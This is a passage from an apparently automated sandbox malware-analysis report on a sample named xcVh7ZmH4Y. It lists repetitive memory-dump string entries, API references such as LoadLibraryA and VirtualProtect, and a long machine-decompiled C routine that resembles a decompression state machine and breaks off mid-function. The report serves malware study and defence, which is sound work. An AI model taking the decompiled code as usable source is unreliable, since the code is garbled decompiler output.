                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: [o
                                                                                      • API String ID: 1029625771-1618177226
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &a<O
                                                                                      • API String ID: 0-2023271191
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,<_&
                                                                                      • API String ID: 0-167712520
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &a<O
                                                                                      • API String ID: 0-2023271191
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &a<O
                                                                                      • API String ID: 0-2023271191
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `
                                                                                      • API String ID: 0-1850852036
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `
                                                                                      • API String ID: 0-1850852036
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: m/[W
                                                                                      • API String ID: 0-2002366935
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Similarity
                                                                                      • API ID: LibraryLoadMemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3389902171-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00406D85(signed int __ebx, signed int* __esi) {
                                                                                      				signed int _t396;
                                                                                      				signed int _t425;
                                                                                      				signed int _t442;
                                                                                      				signed int _t443;
                                                                                      				signed int* _t446;
                                                                                      				void* _t448;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					_t446 = __esi;
                                                                                      					_t425 = __ebx;
                                                                                      					if( *(_t448 - 0x34) == 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					L55:
                                                                                      					__eax =  *(__ebp - 0x38);
                                                                                      					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      					__ecx = __ebx;
                                                                                      					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      					__ebx = __ebx + 8;
                                                                                      					while(1) {
                                                                                      						L56:
                                                                                      						if(__ebx < 0xe) {
                                                                                      							goto L0;
                                                                                      						}
                                                                                      						L57:
                                                                                      						__eax =  *(__ebp - 0x40);
                                                                                      						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                      						__ecx = __eax;
                                                                                      						__esi[1] = __eax;
                                                                                      						__ecx = __eax & 0x0000001f;
                                                                                      						if(__cl > 0x1d) {
                                                                                      							L9:
                                                                                      							_t443 = _t442 | 0xffffffff;
                                                                                      							 *_t446 = 0x11;
                                                                                      							L10:
                                                                                      							_t446[0x147] =  *(_t448 - 0x40);
                                                                                      							_t446[0x146] = _t425;
                                                                                      							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                      							L11:
                                                                                      							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                      							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                      							E004074F4( *(_t448 + 8));
                                                                                      							return _t443;
                                                                                      						}
                                                                                      						L58:
                                                                                      						__eax = __eax & 0x000003e0;
                                                                                      						if(__eax > 0x3a0) {
                                                                                      							goto L9;
                                                                                      						}
                                                                                      						L59:
                                                                                      						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                      						__ebx = __ebx - 0xe;
                                                                                      						_t94 =  &(__esi[2]);
                                                                                      						 *_t94 = __esi[2] & 0x00000000;
                                                                                      						 *__esi = 0xc;
                                                                                      						while(1) {
                                                                                      							L60:
                                                                                      							__esi[1] = __esi[1] >> 0xa;
                                                                                      							__eax = (__esi[1] >> 0xa) + 4;
                                                                                      							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                      								goto L68;
                                                                                      							}
                                                                                      							L61:
                                                                                      							while(1) {
                                                                                      								L64:
                                                                                      								if(__ebx >= 3) {
                                                                                      									break;
                                                                                      								}
                                                                                      								L62:
                                                                                      								if( *(__ebp - 0x34) == 0) {
                                                                                      									goto L182;
                                                                                      								}
                                                                                      								L63:
                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      								__ecx = __ebx;
                                                                                      								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      								__ebx = __ebx + 8;
                                                                                      							}
                                                                                      							L65:
                                                                                      							__ecx = __esi[2];
                                                                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                      							__ebx = __ebx - 3;
                                                                                      							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                                      							__ecx =  *_t108;
                                                                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                      							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                      							__ecx = __esi[1];
                                                                                      							__esi[2] = __esi[2] + 1;
                                                                                      							__eax = __esi[2];
                                                                                      							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                      							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                      								goto L64;
                                                                                      							}
                                                                                      							L66:
                                                                                      							while(1) {
                                                                                      								L68:
                                                                                      								if(__esi[2] >= 0x13) {
                                                                                      									break;
                                                                                      								}
                                                                                      								L67:
                                                                                      								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                                      								__eax =  *_t119;
                                                                                      								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                      								_t126 =  &(__esi[2]);
                                                                                      								 *_t126 = __esi[2] + 1;
                                                                                      							}
                                                                                      							L69:
                                                                                      							__ecx = __ebp - 8;
                                                                                      							__edi =  &(__esi[0x143]);
                                                                                      							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                      							__eax = 0;
                                                                                      							 *(__ebp - 8) = 0;
                                                                                      							__eax =  &(__esi[3]);
                                                                                      							 *__edi = 7;
                                                                                      							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                      							if(__eax != 0) {
                                                                                      								L72:
                                                                                      								 *__esi = 0x11;
                                                                                      								while(1) {
                                                                                      									L180:
                                                                                      									_t396 =  *_t446;
                                                                                      									if(_t396 > 0xf) {
                                                                                      										break;
                                                                                      									}
                                                                                      									L1:
                                                                                      									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                                      										case 0:
                                                                                      											L101:
                                                                                      											__eax = __esi[4] & 0x000000ff;
                                                                                      											__esi[3] = __esi[4] & 0x000000ff;
                                                                                      											__eax = __esi[5];
                                                                                      											__esi[2] = __esi[5];
                                                                                      											 *__esi = 1;
                                                                                      											goto L102;
                                                                                      										case 1:
                                                                                      											L102:
                                                                                      											__eax = __esi[3];
                                                                                      											while(1) {
                                                                                      												L105:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L103:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L104:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L106:
                                                                                      											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                      											__eax = __eax &  *(__ebp - 0x40);
                                                                                      											__ecx = __esi[2];
                                                                                      											__eax = __esi[2] + __eax * 4;
                                                                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                      											__ecx =  *__eax & 0x000000ff;
                                                                                      											__eflags = __ecx;
                                                                                      											if(__ecx != 0) {
                                                                                      												L108:
                                                                                      												__eflags = __cl & 0x00000010;
                                                                                      												if((__cl & 0x00000010) == 0) {
                                                                                      													L110:
                                                                                      													__eflags = __cl & 0x00000040;
                                                                                      													if((__cl & 0x00000040) == 0) {
                                                                                      														goto L125;
                                                                                      													}
                                                                                      													L111:
                                                                                      													__eflags = __cl & 0x00000020;
                                                                                      													if((__cl & 0x00000020) == 0) {
                                                                                      														goto L9;
                                                                                      													}
                                                                                      													L112:
                                                                                      													 *__esi = 7;
                                                                                      													goto L180;
                                                                                      												}
                                                                                      												L109:
                                                                                      												__esi[2] = __ecx;
                                                                                      												__esi[1] = __eax;
                                                                                      												 *__esi = 2;
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L107:
                                                                                      											__esi[2] = __eax;
                                                                                      											 *__esi = 6;
                                                                                      											goto L180;
                                                                                      										case 2:
                                                                                      											L113:
                                                                                      											__eax = __esi[2];
                                                                                      											while(1) {
                                                                                      												L116:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L114:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L115:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L117:
                                                                                      											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                      											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                      											__ecx = __eax;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - __eax;
                                                                                      											__eflags = __ebx;
                                                                                      											__eax = __esi[4] & 0x000000ff;
                                                                                      											__esi[3] = __esi[4] & 0x000000ff;
                                                                                      											__eax = __esi[6];
                                                                                      											__esi[2] = __esi[6];
                                                                                      											 *__esi = 3;
                                                                                      											goto L118;
                                                                                      										case 3:
                                                                                      											L118:
                                                                                      											__eax = __esi[3];
                                                                                      											while(1) {
                                                                                      												L121:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L119:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L120:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L122:
                                                                                      											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                      											__eax = __eax &  *(__ebp - 0x40);
                                                                                      											__ecx = __esi[2];
                                                                                      											__eax = __esi[2] + __eax * 4;
                                                                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                      											__ecx =  *__eax & 0x000000ff;
                                                                                      											__eflags = __cl & 0x00000010;
                                                                                      											if((__cl & 0x00000010) == 0) {
                                                                                      												L124:
                                                                                      												__eflags = __cl & 0x00000040;
                                                                                      												if((__cl & 0x00000040) != 0) {
                                                                                      													goto L9;
                                                                                      												}
                                                                                      												L125:
                                                                                      												__esi[3] = __ecx;
                                                                                      												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                      												__esi[2] = __eax;
                                                                                      												goto L180;
                                                                                      											}
                                                                                      											L123:
                                                                                      											__esi[2] = __ecx;
                                                                                      											__esi[3] = __eax;
                                                                                      											 *__esi = 4;
                                                                                      											goto L180;
                                                                                      										case 4:
                                                                                      											L126:
                                                                                      											__eax = __esi[2];
                                                                                      											while(1) {
                                                                                      												L129:
                                                                                      												__eflags = __ebx - __eax;
                                                                                      												if(__ebx >= __eax) {
                                                                                      													break;
                                                                                      												}
                                                                                      												L127:
                                                                                      												__eflags =  *(__ebp - 0x34);
                                                                                      												if( *(__ebp - 0x34) == 0) {
                                                                                      													goto L182;
                                                                                      												}
                                                                                      												L128:
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                      												__ecx = __ebx;
                                                                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                      												__ebx = __ebx + 8;
                                                                                      												__eflags = __ebx;
                                                                                      											}
                                                                                      											L130:
                                                                                      											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                      											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                      											__ecx = __eax;
                                                                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                      											__ebx = __ebx - __eax;
                                                                                      											__eflags = __ebx;
                                                                                      											 *__esi = 5;
                                                                                      											goto L131;
                                                                                      										case 5:
                                                                                      											L131:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__edx = __esi[3];
                                                                                      											__eax = __eax - __esi;
                                                                                      											__ecx = __eax - __esi - 0x1ba0;
                                                                                      											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                      											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                      												__ecx = __eax;
                                                                                      												__ecx = __eax - __edx;
                                                                                      												__eflags = __ecx;
                                                                                      											} else {
                                                                                      												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                      												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                      												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                      											}
                                                                                      											__eflags = __esi[1];
                                                                                      											 *(__ebp - 0x20) = __ecx;
                                                                                      											if(__esi[1] != 0) {
                                                                                      												L135:
                                                                                      												__edi =  *(__ebp - 0x2c);
                                                                                      												do {
                                                                                      													L136:
                                                                                      													__eflags = __edi;
                                                                                      													if(__edi != 0) {
                                                                                      														goto L152;
                                                                                      													}
                                                                                      													L137:
                                                                                      													__edi = __esi[0x26e8];
                                                                                      													__eflags = __eax - __edi;
                                                                                      													if(__eax != __edi) {
                                                                                      														L143:
                                                                                      														__esi[0x26ea] = __eax;
                                                                                      														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                      														__eax = __esi[0x26ea];
                                                                                      														__ecx = __esi[0x26e9];
                                                                                      														__eflags = __eax - __ecx;
                                                                                      														 *(__ebp - 0x30) = __eax;
                                                                                      														if(__eax >= __ecx) {
                                                                                      															__edi = __esi[0x26e8];
                                                                                      															__edi = __esi[0x26e8] - __eax;
                                                                                      															__eflags = __edi;
                                                                                      														} else {
                                                                                      															__ecx = __ecx - __eax;
                                                                                      															__edi = __ecx - __eax - 1;
                                                                                      														}
                                                                                      														__edx = __esi[0x26e8];
                                                                                      														__eflags = __eax - __edx;
                                                                                      														 *(__ebp - 8) = __edx;
                                                                                      														if(__eax == __edx) {
                                                                                      															__edx =  &(__esi[0x6e8]);
                                                                                      															__eflags = __ecx - __edx;
                                                                                      															if(__ecx != __edx) {
                                                                                      																__eax = __edx;
                                                                                      																__eflags = __eax - __ecx;
                                                                                      																 *(__ebp - 0x30) = __eax;
                                                                                      																if(__eax >= __ecx) {
                                                                                      																	__edi =  *(__ebp - 8);
                                                                                      																	__edi =  *(__ebp - 8) - __eax;
                                                                                      																	__eflags = __edi;
                                                                                      																} else {
                                                                                      																	__ecx = __ecx - __eax;
                                                                                      																	__edi = __ecx;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      														__eflags = __edi;
                                                                                      														if(__edi == 0) {
                                                                                      															goto L183;
                                                                                      														} else {
                                                                                      															goto L152;
                                                                                      														}
                                                                                      													}
                                                                                      													L138:
                                                                                      													__ecx = __esi[0x26e9];
                                                                                      													__edx =  &(__esi[0x6e8]);
                                                                                      													__eflags = __ecx - __edx;
                                                                                      													if(__ecx == __edx) {
                                                                                      														goto L143;
                                                                                      													}
                                                                                      													L139:
                                                                                      													__eax = __edx;
                                                                                      													__eflags = __eax - __ecx;
                                                                                      													if(__eax >= __ecx) {
                                                                                      														__edi = __edi - __eax;
                                                                                      														__eflags = __edi;
                                                                                      													} else {
                                                                                      														__ecx = __ecx - __eax;
                                                                                      														__edi = __ecx;
                                                                                      													}
                                                                                      													__eflags = __edi;
                                                                                      													if(__edi == 0) {
                                                                                      														goto L143;
                                                                                      													}
                                                                                      													L152:
                                                                                      													__ecx =  *(__ebp - 0x20);
                                                                                      													 *__eax =  *__ecx;
                                                                                      													__eax = __eax + 1;
                                                                                      													__ecx = __ecx + 1;
                                                                                      													__edi = __edi - 1;
                                                                                      													__eflags = __ecx - __esi[0x26e8];
                                                                                      													 *(__ebp - 0x30) = __eax;
                                                                                      													 *(__ebp - 0x20) = __ecx;
                                                                                      													 *(__ebp - 0x2c) = __edi;
                                                                                      													if(__ecx == __esi[0x26e8]) {
                                                                                      														__ecx =  &(__esi[0x6e8]);
                                                                                      														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                      													}
                                                                                      													_t357 =  &(__esi[1]);
                                                                                      													 *_t357 = __esi[1] - 1;
                                                                                      													__eflags =  *_t357;
                                                                                      												} while ( *_t357 != 0);
                                                                                      											}
                                                                                      											goto L23;
                                                                                      										case 6:
                                                                                      											L156:
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											__edi =  *(__ebp - 0x30);
                                                                                      											__eflags = __eax;
                                                                                      											if(__eax != 0) {
                                                                                      												L172:
                                                                                      												__cl = __esi[2];
                                                                                      												 *__edi = __cl;
                                                                                      												__edi = __edi + 1;
                                                                                      												__eax = __eax - 1;
                                                                                      												 *(__ebp - 0x30) = __edi;
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											L157:
                                                                                      											__ecx = __esi[0x26e8];
                                                                                      											__eflags = __edi - __ecx;
                                                                                      											if(__edi != __ecx) {
                                                                                      												L163:
                                                                                      												__esi[0x26ea] = __edi;
                                                                                      												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                      												__edi = __esi[0x26ea];
                                                                                      												__ecx = __esi[0x26e9];
                                                                                      												__eflags = __edi - __ecx;
                                                                                      												 *(__ebp - 0x30) = __edi;
                                                                                      												if(__edi >= __ecx) {
                                                                                      													__eax = __esi[0x26e8];
                                                                                      													__eax = __esi[0x26e8] - __edi;
                                                                                      													__eflags = __eax;
                                                                                      												} else {
                                                                                      													__ecx = __ecx - __edi;
                                                                                      													__eax = __ecx - __edi - 1;
                                                                                      												}
                                                                                      												__edx = __esi[0x26e8];
                                                                                      												__eflags = __edi - __edx;
                                                                                      												 *(__ebp - 8) = __edx;
                                                                                      												if(__edi == __edx) {
                                                                                      													__edx =  &(__esi[0x6e8]);
                                                                                      													__eflags = __ecx - __edx;
                                                                                      													if(__ecx != __edx) {
                                                                                      														__edi = __edx;
                                                                                      														__eflags = __edi - __ecx;
                                                                                      														 *(__ebp - 0x30) = __edi;
                                                                                      														if(__edi >= __ecx) {
                                                                                      															__eax =  *(__ebp - 8);
                                                                                      															__eax =  *(__ebp - 8) - __edi;
                                                                                      															__eflags = __eax;
                                                                                      														} else {
                                                                                      															__ecx = __ecx - __edi;
                                                                                      															__eax = __ecx;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													goto L183;
                                                                                      												} else {
                                                                                      													goto L172;
                                                                                      												}
                                                                                      											}
                                                                                      											L158:
                                                                                      											__eax = __esi[0x26e9];
                                                                                      											__edx =  &(__esi[0x6e8]);
                                                                                      											__eflags = __eax - __edx;
                                                                                      											if(__eax == __edx) {
                                                                                      												goto L163;
                                                                                      											}
                                                                                      											L159:
                                                                                      											__edi = __edx;
                                                                                      											__eflags = __edi - __eax;
                                                                                      											if(__edi >= __eax) {
                                                                                      												__ecx = __ecx - __edi;
                                                                                      												__eflags = __ecx;
                                                                                      												__eax = __ecx;
                                                                                      											} else {
                                                                                      												__eax = __eax - __edi;
                                                                                      												__eax = __eax - 1;
                                                                                      											}
                                                                                      											__eflags = __eax;
                                                                                      											if(__eax != 0) {
